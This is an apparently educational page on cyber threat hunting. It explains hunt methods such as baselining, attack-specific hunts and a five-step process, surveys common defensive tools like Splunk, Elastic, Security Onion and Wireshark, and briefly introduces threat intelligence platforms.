05 CYBER SECURITY ANALYTICS TOOLS - THREAT HUNTING
Contents
05 CYBER SECURITY ANALYTICS TOOLS - THREAT HUNTING¶
What is Cyber Threat Hunting?: Cyber threat hunting is a proactive security search through networks, endpoints, and datasets to hunt malicious, suspicious, or risky activities that have evaded detection by existing tools. Thus, there is a distinction between cyber threat detection versus cyber threat hunting. Threat detection is a somewhat passive approach to monitoring data and systems for potential security issues, but it’s still a necessity and can aid a threat hunter. Proactive cyber threat hunting tactics have evolved to use new threat intelligence on previously collected data to identify and categorize potential threats in advance of attack.
Security personnel can’t afford to believe that their security system is impenetrable. They must remain ever vigilant for the next threat or vulnerability. Rather than sit back and wait for threats to strike, cyber threat hunting develops hypotheses based on knowing the behaviors of threat actors and validating those hypotheses through active searches in the environment. With threat hunting, an expert doesn’t start from an alert or even Indicators of Compromise (IOC) but deeper reasoning and forensics. In many cases the hunter’s efforts create and substantiate the alert or IOC. Cyber threat hunting aggressively assumes that a breach in the enterprise has or will occur. Security personnel hunt down threats in their environment rather than deploy the latest tool.
Threat hunting investigations¶
Traditional cyber threat hunting is based on a manual process in which a security analyst scrutinizes data based on their knowledge of the network and systems to build assumptions about potential threats. Cyber threat hunting has advanced in effectiveness and efficiency through the addition of automation, machine learning, and user and entity behavior analytics (UEBA) to alert enterprise security teams of potential risks.
Once the risk or potential risk, as well as frequency of a hunt has been determined, an investigation is initiated. Examples of Cyber Threat Hunting investigations include:
Hypothesis Driven Investigations: When significant information of a new, imminent threat vector is discovered, cyber threat hunting will delve deeper into network or system logs in search of hidden anomalies or trends that could signal the new threat. Analytics Driven Investigation: Searches based on information gathered from Machine Learning (ML) and Artificial Intelligence (AI) tools.
Tactics, Techniques, and Procedures (TTP) Investigation: Hunting for attack mannerisms typically use the same operational techniques. This is helpful to source or attribute the threat and to leverage existing remediation methods that worked with these behaviors. Threat hunting is specific to each environment, but some techniques can be applied to almost any environment. Core threat hunting techniques include:
Baselining¶
Baselining helps the hunter understand what “normal” looks like within an organization. SANS describes the value of baselining as looking for a needle in a haystack by removing the hay in double-digit percentages to shorten the time needed for the needle to become visible. To help minimize the time needed to combine baseline analysis with attacker technique, SANS suggests hunters consider the following questions:
How prevalent is PowerShell in your environment?¶
If prevalent, what does normal system administrator activity look like? Where does PowerShell activity typically come from, and what user accounts typically run it? As a result, a hunter may not need to baseline all of PowerShell, but rather look for unexpected outliers or attacker-specific command structures.
Attack-Specific Hunts¶
Baselining aids the hunter in understanding the overall hunt environment, but attack-specific hunts can help track malicious activity faster. Attack-specific hunts typically focus on a specific threat actor or threat. However, the limits of their specific hunt model can throw off false positives. Attack-specific hunts combine with baselining often produce good results.
Time Sensitivity¶
All hunts are time sensitive, and therefore require hunters to validate their baseline terms periodically. SANS recommends confirming that new software implementations are not causing unnecessary traffic resulting in false-positive data. Keeping up with attackers’ shifting to new techniques – or reverting back to old techniques – require hunters to validate intelligence-based hunts and even hunt again if legacy techniques are detected.
Third-Party Sources¶
Hunting for needles in a data haystack can overwhelm teams of hunters. Third-party providers can help guide hunters to more successful hunts. SANS lists the following benefits hunters can gather from third-party sources:
Ruling out false positive leads
Focus on interesting leads
IP lookups
Geolocation
Encrypted traffic metadata
Log detection
Attacker technique overlays
Link analysis of internal vs. external or host vs. network data points
Five threat hunting steps¶
A cyber threat hunt is composed of steps or processes designed for an efficient, successful hunt. These steps include:
Step 1: Hypothesis Threat hunts begin with a hypothesis or a statement about the hunter’s ideas of what threats might be in the environment and how to go about finding them. A hypothesis can include a suspected attacker’s tactics, techniques, and procedures (TTPs). Threat hunters use threat intelligence, environmental knowledge, and their own experience and creativity to build a logical path to detection.
Step 2: Collect and Process Intelligence and Data Hunting for threats requires quality intelligence and data. A plan for collecting, centralizing, and processing data is required. Security Information and Event Management (SIEM) software can provide insight and a track record of activities in an enterprise’s IT environment.
Step 3: Trigger A hypothesis can act as a trigger when advanced detection tools point threat hunters to initiate an investigation of a particular system or specific area of a network.
Step 4: Investigation Investigative technology, such as Endpoint Detection and Response (EDR), can hunt or search deep into potentially malicious anomalies in a system or network, ultimately determined to be benign or confirmed as malicious.
Step 5: Response/Resolution Data gathered from confirmed malicious activity can be entered into automated security technology to respond, resolve, and mitigate threats. Actions can include removing malware files, restoring altered or deleted files to their original state, updating firewall /IPS rules, deploying security patches, and changing system configurations – all the while better understanding what occurred and how to improve your security against similar future attacks.
Threat Hunting using Notebook Technologies
Splunk: One of most commonly used SIEM platforms, Splunk is well known for data ingest and analysis.
elastic: Formerly known as ELK stack, a suite comprised of ElasticSearch, Logstash and Kibana for instrumenting data collection and analysis to create a SIEM environment.
Security Onion: a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.
Kali Linux: A widely-used Linux distribution for security, built upon Debian, it comes pre-loaded with a wide range of security tools and software.
Python: Programming/scripting language for rapid code development. Used widely by security professionals and software developers alike.
Bash: GNU Bourne Again SHell. A sh-compatible command language interpreter that executes commands read from the standard input or from a file. Used as part of the Linux command line interface.
Wireshark: A widely-used packet capture (PCAP) tool for analysing network traffic. Alternative tools include tcpdump that is a command line packet capture tool, and tshark that is a CLI tool for Wireshark.
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tshark, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can’t handle, like sending invalid frames, injecting your own 802.11 frames, and much more.
Security orchestration, automation and response (SOAR): Designed to integrate multiple components, often from different vendors. They allow organizations to streamline security operations in three key areas: threat and vulnerability management, incident response, and security operations automation.
What is Cyber threat intelligence?¶
Cyber threat intelligence is the process of knowing about the threats and test the harmful vulnerabilities in cyberspace. Such sources include open-source intelligence, social media intelligence, human intelligence, technical intelligence, or intelligence from the deep and dark web. These are critical security tools that use global security data to help proactively identify, mitigate, and remediate security threats.
How did threat intelligence platforms work?¶
A Threat Intelligence Platform works with SIEM and Log management system vendors behind the scenes, pulling down indicators to push across to security solutions within the customer network infrastructure. The burden of establishing and maintaining these integrations is therefore lifted from the analysts and instead shifted over to the SIEM and TIP vendors.
It’s very useful to many teams within an organization such as Security Operations Center (SOC) Teams, Threat Intelligence Teams, Management, and Executive Teams. And Possible security product integrations include API, SIEM, Endpoint, IPS, and Firewall.
Here’s the Cyber Threat Intelligence Tools List:¶
A Threat Intelligence is an evidence-based knowledge, which including context, mechanisms, indicators, implications, and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard. For more details, please check here.